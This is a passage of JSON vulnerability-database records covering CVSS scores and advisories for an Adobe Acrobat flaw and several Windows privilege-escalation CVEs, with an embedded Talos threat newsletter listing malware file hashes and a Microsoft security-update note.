"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550"], "modified": "2021-06-23T05:53:42", "id": "VERACODE:31029", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-31029/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-05-27T15:17:54", "description": "Adobe Acrobat and Reader contains a use-after-free vulnerability that could allow an unauthenticated attacker to achieve code execution in the context of the current user.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Adobe Acrobat and Reader Use-After-Free Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-28550", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-25T15:17:44", "description": "Microsoft Windows Update Medic Service contains an unspecified vulnerability that allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Update Medic Service Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36948"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-36948", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Microsoft Enhanced Cryptographic Provider contains an unspecified vulnerability that allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Enhanced Cryptographic Provider Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31201"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31201", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Microsoft Enhanced Cryptographic Provider contains an unspecified vulnerability that allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Enhanced Cryptographic Provider Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31199"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31199", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T15:52:18", "description": "Microsoft Windows CSRSS contains an unspecified vulnerability which allows for privilege escalation to SYSTEM privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Client Server Runtime Subsystem (CSRSS) Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2022-07-12T00:00:00", "id": "CISA-KEV-CVE-2022-22047", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "alpinelinux": [{"lastseen": "2023-06-07T21:04:46", "description": "Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by a Use After Free vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-07T21:03:59", "type": "alpinelinux", "title": "CVE-2021-28550", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550"], "modified": "2023-06-07T21:03:59", "id": "ALPINE:CVE-2021-28550", "href": "https://security.alpinelinux.org/vuln/CVE-2021-28550", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2022-07-21T20:00:40", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGV0qm1JxU91RjdxVIuHS5qpDp6eR5oqC3GXE4GKh74vcE6eErdX-odGGmldK4seEV08PmWVUMwC9eHiY-MNvEWPJqq7kEe3k9gjAfn0ai-JRQnZ3GdRiAki_wed_Ctz2-MbeTD591fAVRErXhYumK3_GFcUGqEBUmnA_aeVfgK2rZKQ7AW0eYUiY/s2000/threat-source-newsletter.jpg>)\n\n_By Jon Munshaw. _\n\n[](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>)\n\nWelcome to this week\u2019s edition of the Threat Source newsletter. \n\n \n\n\nI could spend time in this newsletter every week talking about fake news. There are always so many ridiculous memes, headlines, misleading stories, viral Facebook posts and manipulated media that I see come across my Instagram feed or via my wife when she shows me TikToks she favorited. \n\n \n\n\nOne recent event, though, was so crushing to me that I had to call it out specifically. [Former Japanese Prime Minister Shinzo Abe was assassinated](<https://www.nytimes.com/live/2022/07/08/world/japan-shinzo-abe-shooting>) earlier this month while making a campaign speech in public. This was a horrible tragedy marking the death of a powerful politician in one of the world\u2019s most influential countries. It was the top story in the world for several days and was even more shocking given Japan\u2019s strict gun laws and the relative infrequency of any global leaders being the target of violence. \n\n \n\n\nIt took no time for the internet at large to take this tragedy and immediately try to spin it to their whims to spread false narratives, disinformation and downright harmful fake stories that mar Abe\u2019s death and make a mockery of the 24/7 news cycle and the need for everyone to immediately have their own \u201ctake\u201d on social media. \n\n \n\n\nShortly after Abe\u2019s murder, a far-right French politician took a false claim from the infamous online forum 4chan that video game developer Hideo Kojima was the suspect who killed Abe and [shared it on Twitter.](<https://www.bbc.com/news/newsbeat-62121650>) The politician, Damien Rieu, even went as far to connect Kojima to the \u201cfar left,\u201d linking to pictures of the \u201cMetal Gear Solid\u201d creator wearing a shirt depicting the Joker and a bag with Che Guevara\u2019s face on it. Rieu\u2019s tweet was [taken as fact by a Greek television news station](<https://kotaku.com/shinzo-abe-assassin-killer-kojima-greek-news-confusion-1849157839>), which also [aired a report](<https://youtu.be/MfQPJggD1Us>) that Kojima was the assassin. \n\n \n\n\nThankfully, this claim was quickly debunked and the [politician issued an apology](<https://twitter.com/DamienRieu/status/1545460974592970752>), but Kojima and his company have [threatened legal action](<https://www.videogameschronicle.com/news/legal-action-threatened-as-hideo-kojima-falsely-linked-to-shinzo-abe-assassination/>) over the ordeal (as they should). This is an appalling scenario in which social media was quick to assign blame for Abe\u2019s assassination, then picked up by an influential person and even making it to a reputable international news station. This goes beyond the realm of the typical \u201cRussian bot\u201d fake news we think of this was a failure to run any simple fact checks before reporting a damning claim about someone. Imagine if it was just anyone who was blamed for Abe\u2019s assassination, and not someone like Kojima who has a very public platform and the funds to fight these claims. \n\n \n\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhptqreL2kFkNoBxL-NGrBPSwlnAY8sv3eiiN0bwTAACJXRiQB69a8jp752bncymBYSD_SC9JV3jCHn73HzQMV3s950OgaXzIbQM_4Kpd4_f2245CG2E1IXo8f7zW0qGxNO2hQ6F9fA3G4J1piu7ue3esWeL2eWi-0dXgDfUl3U4YH4QKkwPiCnZxfo/s2053/Screenshot_20220720-135745.png>)\n\nPeople also took the opportunity within the first few hours of Abe\u2019s death to try and craft their own narrative using fake news and misleading information. A viral claim that he was killed over his COVID-19-related policies made the rounds, though these claims were later proven [verifiably false](<https://www.statesman.com/story/news/politics/politifact/2022/07/13/fact-check-was-shinzo-abe-assassinated-over-covid-19-response/65372187007/>). Another completely fake and manipulated screenshot claimed to show that Abe had tweeted shortly before his death that he had incriminating news about [U.S. politician Hillary Clinton](<https://apnews.com/article/Fact-Check-Fake-Shinzo-Abe-Tweet-499806264509>). \n\n \n\n\nI went on Instagram and [found a still-active post](<https://www.instagram.com/p/Cf2CODKutKG/?igshid=YmMyMTA2M2Y=>) from an account with more than 54,000 followers that indicates that Abe was assassinated because he had less-than-strict COVID policies that did not align with the \u201cglobal agenda.\u201d Instagram flagged the post as \u201cmissing context,\u201d but does not flag it as downright false and the content is still accessible as of Wednesday afternoon. \n\n \n\n\nWhat disturbs me the most about this whole event is that nothing is off limits for social media users to bend to their whim. I suppose I can't say I\u2019m surprised \u2014 ESPN even recently fell for something as silly as a fake TikTok video alleging to show a [UPS driver dunking a basketball](<https://www.snopes.com/fact-check/ups-driver-dunk-car/>) while jumping over a car. But it is a stark reminder that when breaking news occurs, no matter how serious or dangerous it is, there\u2019s always going to be people online who will be spreading fake news, disinformation and/or misinformation. This makes me miss the days when the biggest fake news story out there was [Balloon Boy](<https://www.latimes.com/entertainment/la-et-media-balloon-boy-pictures-photogallery.html>). \n\n \n\n\n \n\n## The one big thing \n\n> \n\n\nThe U.S. Cybersecurity and Infrastructure Security Agency is asking all federal agencies to [patch for an actively exploited Microsoft vulnerability](<https://threatpost.com/cisa-urges-patch-11-bug/180235/>) disclosed last week. By adding CVE-2022-22047, an elevation of privilege vulnerability affecting the Windows Client Server Runtime Subsystem (CSRSS), to its [list of known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), agencies are compelled to patch for the issue by Aug. 2. Microsoft and CISA both say attackers are actively exploiting the issue in the wild. \n\n\n> ### Why do I care? \n> \n> This vulnerability is the only one disclosed as part of [last week\u2019s Patch Tuesday](<https://blog.talosintelligence.com/2022/07/microsoft-patch-tuesday-for-july-2022.html>) that\u2019s been exploited in the wild. An attacker could exploit this vulnerability to execute code on the targeted machine as SYSTEM. However, they would need physical access to a machine to exploit the issue. That being said, if CISA is warning users that it\u2019s being actively exploited in the wild, it\u2019s good of a time as any to remember to patch. \n\n> \n> ### So now what? \n> \n> [Our Patch Tuesday blog post](<https://blog.talosintelligence.com/2022/07/microsoft-patch-tuesday-for-july-2022.html>) contains links to Microsoft\u2019s updates for Patch Tuesday and a rundown of other vulnerabilities you should know about. Additionally, we have [multiple Snort rules](<https://snort.org/advisories/talos-rules-2022-07-12>) that can detect attempts to exploit CVE-2022-22047. \n\n> \n> \n\n## Other news of note\n\n \n\n\nThe U.S. Department of Homeland Security declared the Log4shell vulnerability is \u201cendemic\u201d and will present a risk to organizations for at least the next decade. A new report into the major vulnerability in Log4j declared that the open-source community does not have enough resources to properly secure its code and needs the public and private sector to assist with the implementation of patches. They also warned that there are still many instances of vulnerable software that attackers could take advantage of. The DHS report also says the original vulnerable code could have been detected in 2013 had the reviewers had the time had the appropriate cybersecurity knowledge to spot the flaw. That being said, the investigating panel said there were no major cyber attacks against U.S. critical infrastructure leveraging Log4shell. ([Dark Reading](<https://www.darkreading.com/application-security/dhs-review-board-deems-log4j-an-endemic-cyber-threat>), [Associated Press](<https://apnews.com/article/biden-technology-software-hacking-4361f6e9b386259609b05b389db4d7bf>), [ZDNet](<https://www.zdnet.com/article/log4j-flaw-why-it-will-still-be-causing-problems-a-decade-from-now/>)) \n\nThe European Union is warning that increased cyber attacks from Russian state-sponsored actors run the risk of unnecessary escalation and spillover effects to all of Europe. A formal EU declaration says that member nations \u201cstrongly condemn this unacceptable behaviour in cyberspace and express solidarity with all countries that have fallen victim.\u201d A Lithuanian energy firm was the recent target of a distributed denial-of-service attack that the country said was the largest cyber attack in a decade. Belgian leaders also say their country was recently targeted by several Chinese state-sponsored groups. ([Bleeping Computer](<https://www.bleepingcomputer.com/news/security/eu-warns-of-russian-cyberattack-spillover-escalation-risks/>), [Council of the European Union](<https://www.consilium.europa.eu/en/press/press-releases/2022/07/19/declaration-by-the-high-representative-on-behalf-of-the-european-union-on-malicious-cyber-activities-conducted-by-hackers-and-hacker-groups-in-the-context-of-russia-s-aggression-against-ukraine/>), [Infosecurity Magazine](<https://www.infosecurity-magazine.com/news/lithuanian-energy-ddos-attack/>)) \n\nA relatively small botnet is suspected to be behind more than 3,000 recent distributed denial-of-service attacks. The Mantis botnet, which is suspected to be an evolution of Meris, has already targeted users in Germany, Taiwan, South Korea, Japan, the U.S. and the U.K. Most recently, it launched a malware campaign against Android users in France, using malicious SMS messages to lure victims into downloading malware that adds devices to the botnet\u2019s growing system. Security researchers say users have already downloaded the malware about 90,000 times. ([Bleeping Computer](<https://www.bleepingcomputer.com/news/security/roaming-mantis-hits-android-and-ios-users-in-malware-phishing-attacks/>), [ZDNet](<https://www.zdnet.com/article/this-tiny-botnet-is-launching-the-most-powerful-ddos-attacks-yet/>)) \n\n \n\n\n## Can\u2019t get enough Talos? \n\n * _[Vulnerability Spotlight: Issue in Accusoft ImageGear could lead to memory corruption, code execution](<https://blog.talosintelligence.com/2022/07/accusoft-vuln-spotlight-.html>)_\n * _[EMEAR Monthly Talos Update: Training the next generation of cybersecurity researchers](<https://blog.talosintelligence.com/2022/07/emear-monthly-talos-update-training.html>)_\n * _[Beers with Talos Ep. #123: Hunting for ransomware actors on *whispers* the dark web](<https://talosintelligence.com/podcasts/shows/beers_with_talos/episodes/123>)_\n * _[Talos Takes Ep. #104: The psychology of multi-factor authentication](<https://talosintelligence.com/podcasts/shows/talos_takes/episodes/104>)_\n * _[Pakistani Hackers Targeting Indian Students in Latest Malware Campaign](<https://thehackernews.com/2022/07/pakistani-hackers-targeting-indian.html>)_\n \n\n\n \n\n\n## Upcoming events where you can find Talos \n\n#### \n\n\n**[A New HOPE](<https://www.hope.net/index.html>) **(July 22 - 24, 2022) \nNew York City \n\n \n\n\n**[CTIR On Air](<https://www.linkedin.com/video/event/urn:li:ugcPost:6954879507132481537/>) **(July 28, 2022) \nTalos Twitter, LinkedIn and YouTube pages\n\n[ \n](<https://www.ciscolive.com/global.html>)[**BlackHat**](<https://www.blackhat.com/us-22/>) **U.S. **(Aug. 6 - 11, 2022) \nLas Vegas, Nevada \n\n \n\n\n**[DEF CON U.S.](<https://defcon.org/>) **(Aug. 11 - 14, 2022) \nLas Vegas, Nevada \n\n \n\n\n \n\n\n## Most prevalent malware files from Talos telemetry over the past week \n\n** \n**\n\n**SHA 256: **[9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507](<https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507/details>) \n\n**MD5: **2915b3f8b703eb744fc54c81f4a9c67f \n\n**Typical Filename: **VID001.exe ** **\n\n**Claimed Product:** N/A** **\n\n**Detection Name: **Win.Worm.Coinminer::1201 \n\n** \n**\n\n**SHA 256: **[e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934](<https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details>)** \n****MD5: **93fefc3e88ffb78abb36365fa5cf857c ** \n****Typical Filename: **Wextract \n**Claimed Product: **Internet Explorer \n**Detection Name: **PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg \n\n \n\n\n**SHA 256: **[e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c](<https://www.virustotal.com/gui/file/e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c/details>) ** **\n\n**MD5:** a087b2e6ec57b08c0d0750c60f96a74c \n\n**Typical Filename: **AAct.exe ** **\n\n**Claimed Product:** N/A ** **\n\n**Detection Name: **PUA.Win.Tool.Kmsauto::1201** **\n\n** \n**\n\n**SHA 256: **[ea500d77aabc3c9d440480002c3f1d2f2977a7f860f35260edda8a26406ca1c3](<https://www.virustotal.com/gui/file/ea500d77aabc3c9d440480002c3f1d2f2977a7f860f35260edda8a26406ca1c3/details>)** **\n\n**MD5: **5741eadfc89a1352c61f1ff0a5c01c06** **\n\n**Typical Filename: **3.exe \n\n**Claimed Product: **N/A\n\n**Detection Name: **W32.DFC.MalParent \n\n \n\n\n**SHA 256: **[125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645](<https://www.virustotal.com/gui/file/125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645/details>) ** **\n\n**MD5: **2c8ea737a232fd03ab80db672d50a17a \n\n**Typical Filename:** LwssPlayer.scr \n\n**Claimed Product: **\u68a6\u60f3\u4e4b\u5dc5\u5e7b\u706f\u64ad\u653e\u5668 \n\n**Detection Name: **Auto.125E12.241442.in02", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-21T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (July 21, 2022) \u2014 No topic is safe from being targeted by fake news and disinformation", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2022-07-21T18:00:00", "id": "TALOSBLOG:F032D3BBC6D695272384D4A3821130BF", "href": "http://blog.talosintelligence.com/2022/07/threat-source-newsletter-july-21-2022.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2023-05-19T10:54:09", "description": "None\n## **Summary**\n\nLearn more about this security-only update, including improvements, any known issues, and how to get the update. \n\n**REMINDER** [Windows 8.1](<https://docs.microsoft.com/lifecycle/products/windows-81>) will reach end of support on January 10, 2023, at which point technical assistance and software updates will no longer be provided. If you have devices running Windows 8.1, we recommend upgrading them to a more current, in-service, and supported Windows release. If devices do not meet the technical requirements to run a more current release of Windows, we recommend that you replace the device with one that supports Windows 11.Microsoft will not be offering an Extended Security Update (ESU) program for Windows 8.1. Continuing to use Windows 8.1 after January 10, 2023 may increase an organization\u2019s exposure to security risks or impact its ability to meet compliance obligations.For more information, see [Windows 8.1 support will end on January 10, 2023](<https://support.microsoft.com/windows/windows-8-1-support-will-end-on-january-10-2023-3cfd4cde-f611-496a-8057-923fba401e93>).[Windows Server 2012 R2](<https://docs.microsoft.com/lifecycle/products/windows-server-2012-r2>) will reach end of support on October 10, 2023 for Datacenter, Essentials, Embedded Systems, Foundation, and Standard.\n\n**Note** For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements**\n\nThis security-only update includes new improvements for the following issues:\n\n * Starting with this release, we are displaying a dialog box to remind users about the End of Support (EOS) for Windows 8.1 in January 2023. If you click **Remind me later**, the dialog box will appear once every 35 days. If you click **Remind me after the end of support date**, the dialog box will not appear again until after the EOS date. This reminder does not appear on the following:\n * Managed Pro and Enterprise devices.\n * Windows Embedded 8.1 Industry Enterprise and Windows Embedded 8.1 Industry Pro devices.\n * When you use [Encrypting File System (EFS)](<https://docs.microsoft.com/windows/win32/fileio/file-encryption>) files over a remote [Web Distributed Authoring and Versioning (WebDAV) protocol](<https://docs.microsoft.com/openspecs/windows_protocols/ms-wdv/bfde1057-4214-4ca5-a431-fab36ff625bc>) connection, the connection might be unsuccessful.\n * Applications might not run after an AppLocker publisher rule is deployed.\n * Addresses a known issue that might prevent you from using the Wi-Fi hotspot feature. When attempting to use the hotspot feature, the host device might lose the connection to the Internet after a client device connects.\n * Addresses a known issue in which Windows Servers that use the Routing and Remote Access Service (RRAS) might be unable to correctly direct Internet traffic. Devices which connect to the server might not connect to the Internet, and servers can lose connection to the Internet after a client device connects.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [July 2022 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jul>).\n\n## **Known issues in this update**\n\n**Symptom**| **Next step** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nWe are working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5016264](<https://support.microsoft.com/help/5016264>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5015805](<https://support.microsoft.com/help/5015805>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5015877>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update KB5015877](<https://download.microsoft.com/download/7/6/8/768153e1-b292-43b4-9d3a-400fe6813b63/5015877.csv>). \n\n## **References**\n\nFor information about the security updates released on July 14, 2022, see [Deployments - Security Update Guide](<https://msrc.microsoft.com/update-guide/deployments>).Learn about the [standard terminology](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) that is used to describe Microsoft software updates.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mskb", "title": "July 12, 2022\u2014KB5015877 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 